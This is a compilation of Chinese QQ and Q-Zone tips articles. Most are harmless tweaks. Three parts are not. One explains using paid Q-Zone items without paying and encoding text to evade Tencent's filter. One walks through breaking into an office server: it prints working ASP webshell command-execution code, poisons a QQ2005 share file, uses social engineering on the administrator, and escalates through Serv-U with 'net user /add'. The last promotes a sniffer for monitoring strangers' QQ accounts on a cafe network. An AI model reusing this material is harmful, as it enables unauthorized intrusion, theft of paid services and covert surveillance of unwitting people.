绝版青春

QQ和QQ游戏都是绿色软件，重装系统后都可以直接使用，这个特点受到很多朋友的喜爱。虽然它们可以单独正常运行，但是习惯了从QQ面板启动QQ游戏大厅的朋友可能会抱怨了，因为QQ太“绿色”，导致QQ游戏大厅不能从面板启动了。经过笔者仔细研究，发现这是由于注册表中没有建立好QQ游戏大厅的文件路径引起的，只要对症下药，在注册表中添加相应的键值就可以了。
　　在“运行”中输入“regedit”后回车，打开注册表编辑器，定位到
HKEY_LOCAL_MACHINE\SOFTWARE\Tencent，在“Tencent”上点击右键，新建一个项，命名为“QQgame”，再在“QQgame”上点击右键，新建一个名为“SYS”的项，最后选中“SYS”项，在右边的窗口中新建一个名为“HallDirectory”的字符串值，键值为QQ游戏的安装目录，完成后关闭注册表编辑器，然后就可以直接从QQ面板中启动QQ游戏大厅了。



　　提示：还有一处可改的注册表键为HKEY_CURRENT_USER\Software\Tencent\QQGame\SYS，在这里添加相应的键值一样有效，这两处任选一处就可以了。如果觉得每次都要改注册表很麻烦，可以在“SYS”项上点击右键，把键导出为注册表文件（*.reg）单独保存在系统分区以外的地方，以后直接双击这个文件导入注册表就可以了。

绝版青春

很多Q哥Q妹都有了自己的Q-Zone。大家都想设计出具有自己个性的Q-Zone，只是在面对要花费大量的金钱才能购置各种特效道具装扮Q-Zone的时候，显得“囊中羞涩”。那有没有方法不花钱就能够获得这些昂贵的特效道具呢？本期我们向大家解析黑客是如何“复制”别人道具装点Q-Zone的。
    小知识：Q-Zone是腾讯公司的出的一种类似Blog免费空间，可以免费申请开通。开通后可以使用网络日志、相册、音乐盒、神奇花藤、互动等专业动态功能。并可以使用不同道具让空间装饰风格更具个性。

    复制别人的免费道具

    首先打开IE浏览器依次选择最上边的导航的“工具→Internet选项”。选择Internet临时文件中的设置，点击弹出窗口中的查看文件会弹出存放Internet临时文件的文件夹，我们把里面的文件全部删除。

    然后打开一个使用了丰富道具的Q-Zone，再打开刚才说的那个存储Internet临时文件的文件夹，可以看见里面有很多东西，去找一个叫“cgi_diy_windows.fcg?uin=957574…….”的文件。这是存放自定义模块代码的文件。使用浏览器打开文件会看见标准的XML编码。



    我们可以看到在之间分别有“导航标题”、“鼠标”等字样，它们分别表示不同地方的特效道具。大家根据需求来决定自己使用哪一个特效道具。在这两个标记之间的代码就是我们要找的代码。将它们分别复制下来，然后把它们贴进自己的Q-Zone。

    打开并登录你的Q-Zone，依次选择“自定义→个性设置→新建模块”，自己输入模块名称然后提交，提交后会提示“创建成功”，确定后会出现一个窗口，有几个选项都不管它，注意看“评论”，这就是我们要贴代码的地方。



    我们把代码粘进去点击保存会提示“修改成功”，然后确定再点击个性设置下边的那个保存，成功后会有一个提示成功了的窗口，此时重新登录就可以看见刚才代码实现的效果了。

    收费效果免费使用

    大家可能会在这里发现一个问题。有一些效果看见了，但是还有些看不到。是的，看不见的就是这个用户花钱买的效果，下面我们继续解析如何使用收费效果。

    实例中我们看到收费漂浮物的代码如下：
   我们对上述代码进行一下说明，item0=的数字就是效果道具的id。道具的id查询办法很简单，点击装扮空间进入商城，在特效道具上面点击右键选择属性，大家就可以看到属性框中显示GIF图像名称是3500.gif，这里3500就是此商品的id。



    num=4是这一组图片有几张，如果多了或出现小红x的少了不影响显示，只是这一组图片的后面几张不能显示了。e=8是出现的漂浮物数量，数值越大就越多，越多就越慢。下边的http://imgcache.qq.com/qzone/item/orig/11/是图片的真实路径，但是腾讯公司有可能变换一下来防止有人盗用。可是查看这个道具真实路径的办法很简单，在商城里找到漂浮物点一下就可以预览效果，此时眼疾手快，鼠标右键点击一个飘的选择属性就可以看见真实路径了。

    可能有的朋友会问，我们看见的是……../q-Zone/……..为什么源代码中写的是qzone呢？这就是现在网上的很多漂浮物代码不能使用的原因，如果直接输入Q-Zone的话，腾讯会把它转换掉，所以黑客会用z替代掉z骗过腾讯的审查机制。

    小知识：z就是我们开始提到的ASCII码，它是z的ASCII的表示法。大家可以去搜ASCII码表或者相关的软件来转换，这样就可以找到字母所对应的ASCII值了。

    轻松更换背景

    背景和道具所使用的代码是不一样的，在使用背景的时候会有些区别。

    首先找到一个背景商品，然后按右键点属性，就可以看见这个背景的名字。假设这个背景的名字叫做XXX.gif。然后点击背景预览，现在我们去前面提到的Internet临时文件夹里面找到这个XXX.gif文件,点击右键查看它的属性得到它的指向地址，最后把粘贴的地址中的相应部分换成皮肤地址就可以了。



    大家仍然要注意的就是JavaScript中的i和Q-Zone中的z换成ASCII码。下面的方法和前面介绍的一样，我们就不再一一列出了。

    提示：复制使用Q-Zone特效道具是非法行为。本文旨在解析黑客技术，请各位读者朋友不要使用文中介绍的方法非法盗用Q-Zone特效道具。一切因个人原因造成的后果，我们概不负责。

绝版青春

使用QQ时，将鼠标悬停于自己或好友头像上，就会浮现一个显示好友昵称、QQ号码、QQ秀等信息的小面板，细心的你可能会发现有的好友的小面板背景是带图案或是彩色的，这个背景是怎么来的呢？当你进入该好友的Q-zone就不难发现，这个背景与好友的Q-zone背景是一样的，所以，只要我们在自己的Q-zone中设置了背景，即能拥有带色彩或带图案背景的浮动小面板了。



点击QQ主界面上的“菜单”按钮，在弹出的“菜单”窗口中点击“Q-zone”选项，进入Q-zone，单击“装扮空间”链接，再点击搜索栏下拉菜单，将价格选项设定为“0.5Q币以下”，然后点击“查找”按钮就可以找到一些免费的背景和装饰物。



提示：设置完毕后，并不能即时在小面板上显示彩色背景，等待一段时间就可以看到了。

绝版青春

QQ列表中的好友越来越多，但这些好友都加自己为好友了吗？

　　以前也有不少介绍如何查看对方是否加自己为好友的方法，但现在这些方法要么不能实现，要么非常麻烦。其实我们完全可以借助QQ秀来简单的判断对方是否加自己为好友。

　　具体方法如下：双击要查看好友的头像，打开聊天窗口，然后点击右边侧边栏对方QQ秀下方的“查看QQ秀资料”按钮，这时如果弹出窗口显示QQ秀人气与希望盒中有多少个愿望，那么该好友就加你为好友了。反之如果对方没有加你为好友，则为显示只有加对方为好友才能浏览的提示

绝版青春

在QQ空间中提供了一个音乐盒的功能，不过普通用户得支付Q币来购买播放器，这对于大多网友来说还是不能接受的。下面就来教大家怎样在QQ空间中免费添加背景音乐和MTV播放器（两者的操作是相通的，所以只讲解添加MTV播放器的操作）。
　　第一步：登录你的QQ空间(http://Q-zone.qq.com/web)，首先将QQ空间中自带的模板清除掉。

　　第二步：添加MTV播放器了，在此之前有必要了解一下在QQ空间中插入MTV代码的格式。

　　首先谈谈MTV视频文件的格式，常见的比如：wav/wmv/avi/mpg等等。不同格式情况下，QQ空间MTV代码是不一样的，我们分别就这几种情况列出代码，附上详细的QQ空间MTV代码参数说明： 　　

　　1.wav、wmv格式的QQ空间MTV代码

　　<embed SRC=视频文件地址 type=audio/x-pn-realaudio-plugin CONSOLE=Clip1 CONTROLS=ImageWindow HEIGHT=210 WIDTH=290 AUTOSTART=true loop=true>

　　QQ空间代码中的视频文件地址就是网上以.rm、.wmv、wav结尾的网址，如http://www.yesky.com/qq./wav

　　height=210 width=290 表示播放器大小

　　autostart=false 表示是否自动播放 false 否 ture 是

　　loop=false 表示是否重复播放 false 否 ture 是

　　2.avi、mpg结尾的QQ空间MTV代码

　　<embed src="MTV音乐地址" border="0" width="320" height="240" type="application/x-mplayer2"></embed>

　　3.QQ空间MTV代码中的参数介绍

　　Autostart

　　是否在音乐下载完之后就自动播放。true 是，false 否

　　loop

　　是否自动反复播放。LOOP=2 表示重复两次，true 是，false 否

　　hidden

　　是否完全隐藏控制画面，true 为是，false 为否

　　STARTTIME="分:秒"

　　设定歌曲开始播放的时间。如 STARTTIME="00:30" 表示从第30秒处开始播放

　　WIDTH="整数" 和 HIGH="整数"

　　设定控制面板的高度和宽度。(若 HIDDEN="false")

　　ALIGN="center"

　　设定控制面板和旁边文字的对齐方式，其值可以是 top、bottom、center、baseline、 left、

　　right、texttop、middle、absmiddle、absbottomCONTROLS="smallconsole"

　　设定控制面板的外观。预设值是 console

　　console 一般正常面板

　　smallconsole 较小的面板

　　playbutton 只显示播放按钮

　　pausecutton 只显示暂停按钮

　　stopbutton 只显示停止按钮

　　volumelever 只显示音量调节按钮

　　第三步：选择一个你要放在QQ空间上的MTV，接着保存该MTV在网上的地址，如

　　http://mtv2.mooe.com/hr/bqb_carols.wmv，然后在QQ空间中新建一个模板，并在新建模板页面

　　的“评论”文本框中输入如下代码：

　　<div id="layer23" style="left: 0px; overflow: hidden; width: 262px; position: absolute; top: 0px; height: 210px; zindex: 200; padding: 0px" resiziable="true">

　　<embed id="MediaPlayer963" src="http://mtv2.mooe.com/hr/bqb_carols.wmv" width="352" height="288" type="video/x-msvideo" autostart="true" loop="True" Hidden="True" align="left"></div>

　　代码中的"top"是指“距离QQ空间顶端的长度”,“left”是指“距离空间左端的长度”，例如："top:0"并且"left:0"就是表示该播放器处于QQ空间的左上角,其他位置的请大家自行摸索。

第四步：也是最后一步，提交该模板设置并保存即可。

绝版青春

QQ论坛在线状态自推出以来就受到广大Q友的欢迎，已经成为论坛交流的必备之物了。目前腾讯提供的在线图片样式比较少，喜欢求新求变的笔者觉得这显示不出自己的个性，于是自制了一个QQ在线状态，将文字留言替换成了自己的QQ秀图片，只要点击图片就能给笔者发消息；最好玩的是如果笔者更换了QQ秀，这个图片也会随着更换，是不是很酷呢？实现方法很简单，从头到尾只需要一个小软件“QQ等级一目了然”就可以搞定了！

http://pic.comicme.net:6600/uplo ... 060406084140182.jpg

    运行软件后，打开“在线功能”标签，点击“在线状态”按钮后，然后点击界面右下方的“开始”按钮，随便选择一个图片风格号码填入“请填写序号”栏，点击“下一步”，填写QQ号码、网站名称和图片旁的留言，点击“下一步”和“生成论坛代码”，再把窗口中出现的代码复制到记事本中暂时保存。现在得到的代码就是最常见的在图片旁边显示提示信息的样式，离我们的要求还差一步。由于从网页上获取的QQ秀图片地址不一定准确，所以我们还是用软件来获取吧。在“在线功能”标签中点击“在线QQ秀”按钮，填入QQ号码后点击“确定”，你的QQ秀就会显示在下面的窗口里，并且弹出提示菜单，点击菜单上的“保存为论坛代码”按钮后，代码就复制到剪贴版了。打开刚才保存代码的记事本，用“在线QQ秀”代码替换“在线状态”代码中的“图片旁的留言”部分，并删除最前面的两个“[img]”之间的代码（包括两个“[img]”）就得到了我们需要的代码了。最后生成的代码样式为“”（其中的12345678是QQ号码）。将所有代码复制到论坛签名中就可以使用了。

    提示：有些论坛限定了签名的长度（比如电脑迷论坛就限定不能超过50个字符），如果代码中的字符过多就不能正常显示，其实我们还可以动一些小脑筋解决这种问题。将上述代码中的“&Site=网易”删除就可以了，而且不影响在线状态的正常使用和图片显示。在“留言的网站名称”比较长的情况下这种方法尤为有效。

绝版青春

　随着QQ的功能越来越多，QQ占用的资源也是越来越多，为了减小它的资源占用量，大家想出了多种方法其中有把面板中的一些功能去掉的，可是我们有时候还是要用到的,所以不实用。我也发现一个好的方法，可以减小一点QQ的内存占用量。

　　我们先打开打开任务管理器！



　找到TIMPlatform进程文件

　　再打开QQ，这时我们发现任务管理器里随着QQ的启动自动多出来一个TIMPLatform.exe的程序。点右键结束这个进程，看到QQ并没有退出。可见它是无用的，可是白白占用我们2M的内存。

　　那它是做什么用的呢？原来QQ通过它来禁止我们在一台机子上登陆相同的QQ帐号！好了去QQ安装目录下找到TIMPlatform和TIMProxy.dll（TIMPlatform的动态链接库文件）这两个文件，删掉它。



、删除无用的文件

　　以后再用QQ时，它就不会自动加载。而且我们可以在一台机子上登陆两个QQ号，



　两个同样的QQ号被同时运行

　　不过在两分钟内，一个QQ号还会自动退出的。。

绝版青春

　腾讯又给QQ玩家们带来了一个好玩的东东了，那就是QQ秀的整人功能。在使用了QQ秀的整人功能后，对方的QQ秀就会变成被整后的形像，而且该形像在6个小时内会出现“我被QQ号码（整人方QQ号码）”的字样。不过天下没有免费的午餐，Q友们需付一定的Q币方能使用此功能。那下面我们就来看看如何来玩这个好玩的QQ秀整人功能。

　　第一步：首先在浏览器地址栏中输入http://game.qq.com/qqshow/，打开“QQ游戏中心”首页，接着在网页左侧输入QQ的号码和密码登录游戏中心。

　　第二步：登录后将鼠标移动到导航条的“主题”导航栏上，此时在该导航栏的下方会显示一个二级导航条



　　


　　第三步：点击二级导航条上的“整人”字样，此时在该页面的下方即会显示QQ秀的整人商品，每个整人商品的价格在2-5个Q币之间



　　小提示：整人专区商品只能在整人方和被整方相互好友时才能使用。

　　第四步：接下来就可以直接使用该功能了。若你选中了一个整人商品，然后点击“我要整人”按钮，此时会转到“我要整人”页面



　　


　　在页面中有该商品的标价（Q币/个）以及其演示效果。

　　第五步：在“被整人号码”文本框中输入对方的QQ号码，然后再点击“提交”按钮即可。你也可以在“整人留言”文本区域中输入留言文字向对方发送消息。

绝版青春

　　时下，QQ已经成为人们工作、生活中不可或缺的即时通信工具，其霸主地位无人能敌。随着QQ版本的一路升级，其体积和对系统资源的占用也是一路飙升。对此，许多计算机用户特别是计算机软硬件环境较低的用户颇有微辞，而又无可奈何。别急，我们可以自己动手减小QQ的体积和对系统资源的占用，让巨无霸QQ也玩出“迷你”的味道。

　　一、抽脂减肥，拿原版QQ开刀

　　1.卸载多余的组件

　　打开资源管理器，定位到QQ安装目录（一般是C:\ProgramFiles\Tencent\QQ），双击运行“uninst.exe”程序，这是QQ的卸载程序。在弹出的卸载向导窗口中直接点击“下一步”，来到“选定组件”页面。在“选择要卸载的组件”列表中，我们就可以选择自己要卸载的程序了。在QQ 2006中我们可以将“QQ游戏”卸载掉，在QQ 2005我们可以将“腾讯TT”、“腾讯TM”和“QQ游戏”全部卸载掉，以减少其对空间的占用。




　　2.删除无用的功能文件或组件

　　QQ的每一个功能都是有一个或一组功能组件来完成的，但并不是每一个功能我们都用的上，因此我们完全可以将不需要的功能组件删除，从而减小其体积和对系统资源的占用。下面我们详细分析一下QQ安装目录中各文件以及文件夹的用途，然后各位朋友就可以根据自己的实际需要有的放矢了。

　　文件功能注解：

　　BQQApplication.dll──企业好友面板

　　ContentTab.dll、Content_Config、help_01.gif~help_13.gif──用户自定义面板功能

　　QQMusicWelcome.html、QQMusic.exe、OEMApplication.dll──手机娱乐面板、内容资讯面板以及音乐中心

　　QQBUserApplication.dll──腾讯服务面板

　　GroupConnection.dll──互动空间

　　QQMail、MailDll.dll、MailRes.dll──QQ信箱

　　QQexternal.exe──跟广告有关

　　QQMMSender.dll、QQMsgFriendMng.dll──短信发送面板

　　QQLiveUpdate、QQUdpGetFileLib.dll、QQUpdate.txt、QQUpdate.ini──升级文件，QQ自动下载更新文件的模块

　　QRingMng.dll、riched20.dll、Riched32.dll──QQ炫玲管理

　　VCodec.dll、VCodec2.dll、VideoDevice.dll、vphone.dll、VqqAllInOne.dll、VqqDVCapture.dll、vqqset.dll──视频聊天相关文件

　　ChatRoom.exe──聊天室相关文件

　　QQPetProxy──QQ宠物中心

　　QQMagicFace.dll、MagicFlash.exe──QQ魔法表情播放器及相关文件

　　QQNetDisk.dll──网络硬盘 文件夹功能注解： [TMDat]、[TMDLLs]、[TMNEWFACE]、[TMSKINS]、[TMsound]──TM相关文件夹

　　[QQGame]──QQ游戏相关文件夹

　　[TT]──TT浏览器相关文件夹

　　[sound]──声音文件夹

　　[QRingFiles]──炫铃文件夹

　　[QQAddrDat]、[QQAddrPlugin]──通讯录文件夹

　　[mailImage]、[pimskins]──QQ邮箱文件夹

　　[QQBuddy]──商务伴侣文件夹

　　[Chat]、[ChatRoomDll]、[chatskin]──聊天室相关文件夹

　　[Face]──表情文件夹

　　[mailImage]──邮件文件夹

　　[NewSkins]──QQ新皮肤文件夹

　　[SCFace]──服务面板头像文件夹

　　[QQMusicDate]──QQ音乐中心文件夹

　　[qqmusic_images]──QQ音乐中心图像文件夹

　　[QZone]──QQ空间文件夹

　　明白了QQ安装目录下各文件及文件的含义之后，要给QQ瘦身就简单多了，我们只需将相对应的文件一一删除就可以了。另外，在减肥之前建议对“Tencent”目录备份一下，以便进行误操作之后能够恢复。

　　小提示：因QQ版本的不同，上述个别文件或文件夹可能并不存在。

绝版青春

　在前几篇教程中教了大家如何DIY自己的个性空间，但是对于许多新手却只能看着教程干着急，因为不会搜集代码，而看着别人做的QQ空间超酷，自己却不知怎么入手，那能不能将别人的QQ空间复制过来呢？答案是肯定的！！！闲话少说，进入正题吧！

　　提示：请把大写“＜＞”改为小写“<>”

　　第一步：首先我找一位朋友的QQ空间（在复制前最好先征得对方的同意），呵呵～卡通的透明背景Flash、飘移的文字……估计大多数人都喜欢这种布局吧



图1
　　第二步：找到要复制的QQ空间后，记下对方的QQ号码，接着在IE浏览器中输入“http://q-zone.qq.com/fcg-bin/cgi_access_self.fcg?uin=对方的QQ号码&type=0”，此时会打开一个XML文件，在QQ空间中所有自定义的模块和设置都在这个XML文件里了，以下是部分代码：

＜?xml version="1.0" encoding="gb2312" ?＞
- ＜data＞
＜style＞7＜/style＞
＜scenari_no＞496＜/scenari_no＞
＜icoke＞-1＜/icoke＞
- ＜items＞
- ＜item＞
＜type＞1＜/type＞
＜itemno＞1333＜/itemno＞
＜posx＞0＜/posx＞
＜posy＞0＜/posy＞
＜width＞0＜/width＞
＜height＞0＜/height＞
＜zindex＞0＜/zindex＞
＜/item＞
- ＜item＞
＜type＞6＜/type＞
＜itemno＞703＜/itemno＞
＜posx＞706＜/posx＞
＜posy＞280＜/posy＞
＜width＞210＜/width＞
＜height＞120＜/height＞
＜zindex＞0＜/zindex＞
＜/item＞
- ＜item＞
＜type＞7＜/type＞
＜itemno＞3942＜/itemno＞
＜posx＞0＜/posx＞
＜posy＞0＜/posy＞
＜width＞1＜/width＞
＜height＞73＜/height＞
＜zindex＞0＜/zindex＞
＜/item＞
＜/items＞

　　第三步：新建一个文本文件，接着将XML文件的“＜itemno＞＜/itemno＞”中的数字以如下形式进行整理：

1333　703　3942　3942……

　　第四步：在IE浏览器中输入“http://q-zone.qq.com/fcg-bin/cgi_diy_window.fcg?uin=对方的QQ号码&type=11&wndid=在文本文件中整理的数字”，呵呵～打开后你看到了什么？是不是有些像自定义的代码呢？下面是部分代码：

＜?xml version="1.0" encoding="gb2312" ?＞
- ＜data＞
- ＜window＞
＜id＞219107532＜/id＞
＜title＞滚动条＜/title＞
- ＜item＞
＜id＞18134＜/id＞
＜style＞0＜/style＞
＜img＞http://＜/img＞
＜title /＞
＜url＞http://＜/url＞
＜content＞＜img src="javascript:document.getElementById

('initd').style.overflow='hidden';"＞＜/content＞
＜/item＞
＜/window＞
- ＜window＞
＜id＞220026097＜/id＞
＜title＞flash2＜/title＞
- ＜item＞
＜id＞17966＜/id＞
＜style＞0＜/style＞
＜img＞http://＜/img＞
＜title /＞
＜url＞http://＜/url＞
＜content＞＜img src="javascript:document.getElementById ('Mlogo').innerHTML+='＜div

style=\'position:absolute;top:0;left:0;\'＞＜EMBED

src=\'http://imgfree.21cn.com/free/flash/9.swf\' quality=high wmode=\'transparent\'

WIDTH=\'925\' HEIGHT=\'655\' TYPE=\'application/x-shockwave-flash\'＞＜/div＞';"＞＜/content＞
＜/item＞
＜/window＞
- ＜window＞
＜id＞216267259＜/id＞
＜title＞鼠标＜/title＞
- ＜item＞
＜id＞17780＜/id＞
＜style＞0＜/style＞
＜img＞http://＜/img＞
＜title /＞
＜url＞http://＜/url＞
＜content＞＜img src="javascript:document.body.style.cursor='url

(\'http://qqjia.com/learn/q-zone/ani6/1.ani\')'"＞＜/content＞
＜/item＞
＜/window＞

　　对，就是它！在打开页面中黑色显示的文字就是该QQ空间自定义的模块代码了。如果你不知道怎么使用QQ空间自定义代码，可到www.qqparty.cn/qqzt/qqkjdm/index.htm查阅相关代码的使用。除了能看到对方QQ空间的自定义模块代码以外，在“＜title＞＜/title＞”中还明确指出了该自定义代码的类型，如皮肤、模版、挂件等。

　　第五步：你现在要做的就是将页面中黑色的自定义代码一一添加到你的QQ空间里即可。

绝版青春

具体的不知道从哪天起，我的Maxthon浏览器好像不能拦截一些网站的广告了，屏幕的右下角也不时的出现如QQ广告一样的东西，一开始以为是网站和QQ的广告。但越用越不对劲，仔细一看，右下角的根本就不是QQ的广告，出来的整个广告就是一个链接，不像QQ广告外面还有一个框，鼠标放在上面是不会变成手形的，而这个广告，无论鼠标放在什么地方都是手形的。我开始怀疑我中招了，将杀毒软件升级到最新也不能查杀，打开浏览器，上网搜索，发现也有朋友中了这种木马，但该网友提供的方法并不能删除木马，无奈之下只好自己“动手”了，以下就是我的整个手工清除木马的过程，写出来与大家分享。

　　1、常规操作

　　打开任务管理器，查看进程，并没有发现什么不良进程。

　　2、深入挖掘

　　运行Regedit，依次展开HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run，一看，果然多了个新家伙Advapi32，一看键值，竟然加载的是一个Dll文件，而这个文件位于C:\WINDOWS\Downloaded Program Files目录下的_IS_0518目录中。找到了根源就好办了，先删除了启动项，再删除对应的木马文件就行了，但到了C:\WINDOWS\Downloaded Program Files目录一看，发现这些文件根本看不到（开启了显示隐藏文件项）。且重启之后启动项又出现了，很显然，这个木马监视注册表，且文件隐藏。为了剿灭彻底，以下步骤是进入安全模式后进行的（开机时按住F8键或Ctrl键不放直到启动菜单出现）。
　　在第三步之前，我曾尝试直接用第四步的方法删除木马文件，但发现重启之后木马并没有消失，因此初步判断该木马存在备份文件。

　　3、清除木马备份文件

　　打开“我的电脑”进入C:\Windows目录，发现一个可疑目录Backup，进去一看，果然启动项加载的Dll文件也在里面，但启动项加载的却不是这个目录中的文件，很显然这个目录就是木马的备份，先删除这个备份目录再说，但刚刚删除，大概一两秒的时间这个目录又被重新建立。这个木马还真狡猾，竟然在安全模式还能自动加载且监视备份文件，一旦备份文件被删除，马上又会建立。正所谓“以彼之道还施彼身”，它能监视且能自动建立备份目录，我如果能先将目录删除，然后抢在它的前面建立目录不就行了吗？因为Windows是不允许同一目录下有两个文件或目录同名的。但从备份目录被删除到被重新建立中间的间隔太短了，手工肯定是不行的，那么就用Dos时代的批处理吧！先建立如下的批处理文件，命名为Kill.bat，双斜杠之后是注释，实际操作时无需输入。
Move c:\windows\backup c:\windows\bak //将Backup目录重命名为Bak
Md c:\windows\backup //在C:\windows下建立Backup目录
这时再打开“我的电脑”，依次进入C:\windows目录，将Bak目录删除，即完成了木马备份文件的删除。

绝版青春

　服务器上运行的第三方软件历来就被攻击者们看作是入侵目标系统的捷径。现在，著名的腾讯QQ又被列入了这些捷径名单，好在QQ并不是服务器必备的软件之一，所以相信不会造成大范围的危机。文中遇到特殊情况虽然不多，但大家还是应该遵照“可能的就应该防范”的原则做出相应防御。

　　一、在Windows2003中得到的webshell

　　此次渗透的目标是一台OA办公系统服务器。其操作系统新近升级到了Windows2003，但OA仍存在asp文件上传漏洞，所以webshell的取得并没有任何悬念。阻碍是在权限提升时遇到的。

　　登陆webshell后发现只能查看服务器的D盘，对C盘不能进行任何访问，webshell的提示是“没有权限”。这点早在意料之中，因为wenshell只有guests组权限，再加上win2003默认禁止了“Everyone"匿名用户及“Guest"组权限用户访问cmd.exe，还造成了不能通过webshell运行cmd.exe。

　　唯一值得庆幸的是利用Webshell 可以对D盘（存放有web虚拟目录）各个子目录进行读写。这里除了web虚拟目录还有一些数据备份文件和一个腾讯QQ安装目录Tencent。

　　二、破解Serv-u的终极防范

　　Windows2003的种种默认安全配置展示了它强大的一面，近一步提升现有权限似乎已不太可能，直到我试图从系统入手向这台服务器发出FTP链接请求并看到Serv-u的banner时才觉得又有了一线希望。

　　前面提到由于Windows2003对cmd.exe的权限限制，通过webshell方式不能运行cmd.exe，这样的论断在2004年6期的防线的《构建Windows2003堡垒主机》一文也曾提到,但实践表明这并不正确，通过webshell上传本地非2003系统中未受限制的cmd.exe文件到可执行目录，再通过wscript组件，同样能够通过webshell方式在Windows2003下获得相应权限的cmd.exe。结合nc.exe，甚至还能得到一个guest组权限的命令行下的shell。

　　为此，我对老兵的站长助手6.0做了一些改进，增加了如下代码，使其能够利用Wscript.shell组件运行本地上传的cmd.exe。

Function CmdShell()
If Request("SP")<>"" Then Session("ShellPath") = Request("SP")
ShellPath=Session("ShellPath")
if ShellPath="" Then ShellPath = "cmd.exe"
if Request("wscript")="yes" then
checked=" checked"
else
checked=""
end if
If Request("cmd")<>"" Then DefCmd = Request("cmd")
SI="<form method='post'><input name='cmd' Style='width:92%' class='cmd' value='"DefCmd&"'><input type='submit' value='运行'>"
SI=SI&"<textarea Style='width:100%;height:500;' class='cmd'>"
If Request.Form("cmd")<>"" Then
if Request.Form("wscript")="yes" then
Set CM=CreateObject(ObT(1,0))
Set DD=CM.exec(ShellPath&" /c "DefCmd)
aaa=DD.stdout.readall
SI=SI&aaa
else%>
<object runat=server id=ws scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<object runat=server id=ws scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<object runat=server id=fso scope=page classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object>
<%szTempFile = server.mappath("cmd.txt")
Call ws.Run (ShellPath&" /c " & DefCmd & " > " & szTempFile, 0, True)
Set fs = CreateObject("Scripting.FileSystemObject")
Set oFilelcx = fs.OpenTextFile (szTempFile, 1, False, 0)
aaa=Server.HTMLEncode(oFilelcx.ReadAll)
oFilelcx.Close
Call fso.DeleteFile(szTempFile, True)
SI=SI&aaa
end if
End If
SI=SI&chr(13)&"</textarea>"
SI=SI&"SHELL路径：<input name='SP' value='"&ShellPath&"' Style='width:70%'> "
SI=SI&"<input type='checkbox' name='wscript' value='yes'"&checked&">WScript.Shell</form>"
Response.Write SI
End Function

　　利用时只需在shell路径中指定上传的cmd.exe路径，再选中选项Wscript就能运行一些所需权限较低的系统命令，如“net start”或者“netstat -an”，依次运行这两个命令后Webshell回显了众多服务，包括Serv-U FTP Server。

　　活动端口列表中又出现了43958端口，于是我自然想到了神通广大的Serv-u ftp Server本地权限提升漏洞。可真正用到的ftp本地权限提升工具在执行系统命令时，却出现了530错误提示。看来管理员或者其他人对Serv-u打上了布丁或者做了某些安全配置。

　　为了知道究竟是怎样的安全配置，上网查了查相关文章，其中有一篇《Serv-u ftp Server 本地权限提升漏洞的终极防范》很受欢迎，被多方转载，作者是世外高人xiaolu。从错误提示看很有可能做了该文所谓的终极防范，即对ServUDaemon.exe中默认的管理员或密码进行了修改。

　　当然这只是假设，只有将目标服务器上的ServUDaemon.exe下载下来看看具体配置才能确定，但是安装有Serv-u的C盘禁止访问，包括Programe files 目录，权限提升再次受阻。

热门推荐： 玩转珊瑚虫IP增强包及机器人大全  重现Windows自动保存密码功能

　　三、利用QQ2005共享文件漏洞将权限提升到底

　　再次翻了翻D盘，又见到了那个很少能在服务器中看到的Tencent文件夹。查看whatsnew.txt。

　　得知QQ的版本是QQ2005 Beta1，几个于相关文件的创建时间也说明网管最近在服务器上登陆过QQ。难道只能用QQ？经过一番思索，终于想到一个可以利用的QQ2005在文件共享功能上的一则漏洞。

　　该漏洞是随着QQ2005贺岁版新增功能出现的。可以将其危害描述为：利用该漏洞，攻击者可以浏览，读取用户系统中的任意文件（如sam文件、数据备份文件、敏感信息文件）。影响系统：安装有QQ2005贺岁版以上的所有Windows系列操作系统。

　　具体利用方法是：先在本机登陆自己的QQ，调出“QQ菜单”，选择工具－>设置共享，指定C:\或者其他任何有利用价值的分区为共享文件，完成后关闭QQ，找到安装目录下的以QQ帐号命名的文件夹内“ShareInfo.db”文件。上传覆盖目标服务器上相同文件（如：D:\Tencent\QQ\654321\ShareInfo.db）。这样，当网管在服务器上登陆QQ时就会向好友开放C盘为共享目录。

　　因为陌生人是不能共享对方文件，所以还需要用社会工程学申请将管理员加为好友(理由当然越可信越好)。如果管理员通过请求，服务器的C盘会以QQ共享文件目录的名义被共享，原本不能通过WEBSHELL访问的ServUDaemon.exe文件就能被下载，遇到阻碍的权限提升之路又能继续了。

　　当晚管理员就通过了申请，将我添加为好友。珊瑚虫QQ上显示的IP正是目标服务器的IP，于是下载了ServUDaemon.exe文件，用UE打开后查找127.0.0.1，发现默认配置下的内置帐户“LocalAdministrator”果然被改成了“LocalAdministruser”。

　　这看起来是一个很“终极”的防御，但提出该方法的xiaolu似乎没有进行攻防所须的换位思考就将其公布，要知道攻击者只需知道修改后的配置，并对本地权限提升利用工具进行相应的修改，所谓的终极防御也就被攻破了。方法还是用UE打开脱了壳的serv-u本地权限提升利用工具，将LocalAdministrator改为LocalAdministruser即可。

　　然后上传修改后的ftp2.exe，在wscript.shell中执行D:\web\ftp2.exe “net user user password /add”后看看结果，已经成功添加了一个用户。再把该用户加入administrators组和“Remote desktop users”组后登陆了目标服务器的远程桌面。

　　经过重重险阻，终于彻底攻陷了这台坚固的Windows2003堡垒。

　　四、简单启示

　　可以看出，和“服务越少越安全”一样，服务器上运行的“第三方”越少越安全，流行的PcAnywhere、VNC、Serv-U 权限提升和这里提出的利用QQ2005提升权限，都是可以这样避免。

绝版青春

诸位朋友在网吧玩的时候，如果看见漂亮MM怎么办？如果你脸皮够厚的话，当然可以冲上前去向MM要QQ号，当然，前提是MM的男朋友不在旁边：）那你不够厚，或者MM的男朋友在旁边，不方便要QQ号泡MM，那该怎么办？这里，笔者介绍一个有用的小工具给大家--QQ第六感，可以随意监听网络中的任意QQ号。

　　第一步：初始化适配器列表

　　用于获取本机上所有的活动网络适配器，程序在开始时自动调用此命令，需要刷新适配器列表时重新调用。




　　这里还有个自定义，用于自定义网络适配器的各个地址，这里我们不用管它。　

　　第二步：显示在线主机

　　在使用查找在线主机之前，大家先确定“交换机网”这项是不是已经被打开的，也就是前面的灯显示开启状态。

　　点击在线主机，用于获取网络中所有在线主机，程序在开始时自动调用，以备后面监听时使用，需要刷新在线主机时请重新调用。这样就会显示出所有的主机IP地址。






　　第三步：监听QQ号

